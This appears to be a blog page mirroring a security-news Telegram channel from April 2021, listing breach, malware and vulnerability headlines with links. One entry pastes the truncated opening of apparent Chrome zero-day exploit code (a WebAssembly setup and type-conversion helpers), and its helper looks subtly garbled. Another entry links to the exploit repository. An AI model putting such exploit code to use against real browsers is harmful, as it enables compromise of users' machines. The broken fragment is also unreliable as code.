■□□□□ #DataLeak: ParkMobile Breach Exposes License Plate Data, Mobile Numbers of 21M Users. https://krebsonsecurity.com/2021/04/parkmobile-breach-exposes-license-plate-data-mobile-numbers-of-21m-users/ https://t.me/cKure/7591
All posts tagged telegram
April 13, 2021 at 01:57PM
■■□□□ ldsview: Search utility for LDAP directory dumps. https://securityonline.info/ldsview-search-tool-for-ldap-directory-dumps/ https://t.me/cKure/7590
April 13, 2021 at 01:56PM
■■□□□ Britain : Average British computer criminal is young, male and not highly skilled, researcher finds. https://go.theregister.com/feed/www.theregister.com/2021/04/13/computer_misuse_act_convictions_analysis/ https://t.me/cKure/7589
April 13, 2021 at 11:44AM
■■□□□ BRATA Malware Poses as Android Security Scanners on Google Play Store. https://thehackernews.com/2021/04/brata-malware-poses-as-android-security.html https://t.me/cKure/7588
April 13, 2021 at 10:06AM
■■■□□ Google Chrome, Microsoft Edge zero-day vulnerability shared on Twitter. https://www.bleepingcomputer.com/news/security/google-chrome-microsoft-edge-zero-day-vulnerability-shared-on-twitter/ https://t.me/cKure/7587
April 13, 2021 at 10:05AM
■■□□□ VMware SSRF CVE-2021-21975 PoC Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials. https://youtu.be/faeTl8ZPs2s https://t.me/cKure/7586
April 13, 2021 at 12:16AM
■■■□□ #DataLeak: There’s Another Facebook Phone Number Database Online. https://www.vice.com/en/article/qj8dj5/facebook-phone-number-data-breach-telegram-bot https://t.me/cKure/7585
April 12, 2021 at 11:35PM
■□□□□ Apple and Google block official UK COVID-19 app update. https://nakedsecurity.sophos.com/2021/04/12/apple-and-google-block-official-uk-covid-19-app-update/ https://t.me/cKure/7584
April 12, 2021 at 11:22PM
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) var wasm_mod = new WebAssembly.Module(wasm_code); var wasm_instance = new WebAssembly.Instance(wasm_mod); var f = wasm_instance.exports.main; var buf = new ArrayBuffer(8); var f64_buf = new Float64Array(buf); var u64_buf = new Uint32Array(buf); let buf2 = new ArrayBuffer(0x150); function ftoi(val) { f64_buf[0] = val; return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) > 32n); return f64_buf[0]; } const…
April 12, 2021 at 11:21PM
■■■■■ Zero-Day exploit code for Chrome. https://github.com/r4j0x00/exploits/tree/master/chrome-0day https://t.me/cKure/7581
